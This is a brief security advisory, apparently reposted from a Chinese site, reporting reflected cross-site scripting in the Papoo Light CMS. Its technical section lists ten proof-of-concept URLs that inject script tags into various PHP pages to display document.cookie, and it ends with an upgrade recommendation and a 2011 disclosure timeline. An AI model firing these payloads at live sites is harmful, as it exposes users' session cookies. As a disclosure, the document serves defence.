缺陷概述:
==========================
The CMS Papoo Light Version含xss缺陷
==================
技术分析:
==================
http://www.2cto.com /papoo/papoo_light/index.php/"></a><script>alert(document
.cookie);</script>
http://vip.2cto.com /papoo/papoo_light/kontakt.php/"></a><script>alert(docume
nt.cookie);</script>
http://bbs.2cto.com /papoo/papoo_light/inhalt.php/"></a><script>alert(documen
t.cookie);</script>
http://www.honhei.com /papoo/papoo_light/forum.php/"></a><script>alert(document
.cookie);</script>
http://www.2cto.com /papoo/papoo_light/guestbook.php/"></a><script>alert(docu
ment.cookie);</script>
http://www.2cto.com /papoo/papoo_light/account.php/"></a><script>alert(docume
nt.cookie);</script>
http://www.2cto.com /papoo/papoo_light/login.php/"></a><script>alert(document
.cookie);</script>
http://www.2cto.com papoo/papoo_light/index/"></a><script>alert(document.coo
kie);</script>
http://www.2cto.com /papoo/papoo_light/forumthread.php/"></a><script>alert(do
cument.cookie);</script>
http://www.2cto.com /papoo/papoo_light/forum/"></a><script>alert(document.coo
kie);</script>
=========
修复方案:
=========
升级到最新版
====================
Disclosure Timeline:
====================
12-Sep-2011 - informed the developers
12-Sep-2011 - release date of this security advisory
12-Sep-2011 - response and fix by vendor
12-sep-2011 - post on BugTraq